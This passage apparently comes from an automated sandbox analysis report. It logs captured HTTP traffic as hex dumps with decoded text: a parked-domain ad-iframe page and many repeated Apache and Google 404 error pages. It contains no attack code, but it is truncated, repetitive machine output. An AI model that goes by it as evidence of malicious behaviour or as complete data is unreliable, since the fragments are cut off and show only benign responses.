31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:30 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:33 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:36 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:38 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1714X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 